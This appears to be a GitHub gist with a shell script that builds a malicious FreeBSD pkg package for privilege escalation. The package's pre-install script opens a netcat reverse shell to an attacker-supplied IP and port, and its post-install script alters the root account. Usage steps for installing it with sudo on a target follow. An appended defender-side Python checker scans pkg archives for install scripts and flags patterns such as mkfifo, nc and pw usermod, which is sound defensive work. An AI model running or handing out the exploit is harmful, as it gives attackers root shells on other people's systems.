@rishi23root
Last active August 7, 2021 00:21
Exploit for privilege escalation from "pkg" and "pkg install *"

#!/bin/sh
# pkg install * | privilege escalation | by rishi23jain

### TAKES 2 ARGS IP AND PORT FOR REVERSE SHELL

baseDIR=/tmp/exploiter

# clear and make temp dir
rm -fr $baseDIR
mkdir -p $baseDIR

# contains 3 files PRE_INSTALL, POST_INSTALL and MANIFEST

echo "Creating file 1"
cat << EOF > $baseDIR/+PRE_INSTALL
## REVERSE SHELL FOR HACKER
echo "sending root shell";
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $1 $2 >/tmp/f
EOF

echo "creating file 2"
cat << EOF > $baseDIR/+POST_INSTALL
## MAKE sh EXECUTING AS ROOT ALWAYS
echo "making shell ROOT";
pw usermod -n root -s /bin/sh
EOF

echo "creating file 3"
cat << EOF > $baseDIR/+MANIFEST
## SOME INFO OF PACKAGE CREATED
name: hacked
version: "1.0_0"
origin: "sysutils/mypackage"
comment: "hacker"
desc: "for just hacking"
maintainer: [email protected]
www: https://google.com
prefix: /
EOF

# To run the exploit
pkg create -m $baseDIR/ -r $baseDIR/ -o .

To run this exploit.sh:

  1. First make it executable: chmod +x exploit.sh
  2. On the target machine, run ./exploit.sh <hacker-ip> <port> for the reverse shell
  3. sudo pkg install -y --no-repo-update *.txz runs the exploit as a package; more info at https://gtfobins.github.io/gtfobins/pkg/
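Added, defender-side example that is not part of the gist: a Python check to run over a .txz before sudo is allowed to `pkg install` it. It unpacks the archive in memory, lists the +PRE_INSTALL/+POST_INSTALL scripts that pkg(8) executes as root, and flags lines matching the gist's own indicators; the archive it scans is constructed inline to mirror the package built above.

```python
import io
import re
import tarfile

# Members that pkg(8) executes as root while installing or removing a package.
SCRIPT_MEMBERS = {"+PRE_INSTALL", "+POST_INSTALL", "+INSTALL",
                  "+PRE_DEINSTALL", "+POST_DEINSTALL", "+DEINSTALL"}

# Patterns taken from the gist's own install scripts; extend for your environment.
SUSPICIOUS = [
    re.compile(r"\bmkfifo\b"),                  # named pipe used for the reverse shell
    re.compile(r"\b(nc|ncat|netcat)\b"),        # outbound connection from an install script
    re.compile(r"\bpw\s+usermod\b"),            # altering the root account
    re.compile(r"/bin/sh\s+-i\b"),              # interactive shell spawned by a script
]

def inspect_pkg(data: bytes) -> dict:
    """Return {member: script_text} for every install/deinstall script in a pkg(8) archive."""
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            name = member.name[2:] if member.name.startswith("./") else member.name
            if name in SCRIPT_MEMBERS and member.isfile():
                scripts[name] = tar.extractfile(member).read().decode("utf-8", "replace")
    return scripts

def flag_scripts(scripts: dict) -> dict:
    """Return {member: [matching lines]} for scripts that hit a suspicious pattern."""
    hits = {}
    for name, text in scripts.items():
        bad = [ln for ln in text.splitlines() if any(p.search(ln) for p in SUSPICIOUS)]
        if bad:
            hits[name] = bad
    return hits

def build_sample_pkg() -> bytes:
    """Constructed sample shaped like the gist's package (not a real package from any repo)."""
    members = {
        "+MANIFEST": 'name: hacked\nversion: "1.0_0"\nprefix: /\n',
        "+PRE_INSTALL": 'echo "sending root shell"\n',
        "+POST_INSTALL": 'echo "making shell ROOT"\npw usermod -n root -s /bin/sh\n',
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:xz") as tar:
        for name, body in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(body.encode())
            tar.addfile(info, io.BytesIO(body.encode()))
    return buf.getvalue()
```

Any package that carries install scripts at all deserves a manual read before it is installed with root privileges; the pattern list only speeds up triage of the obvious cases.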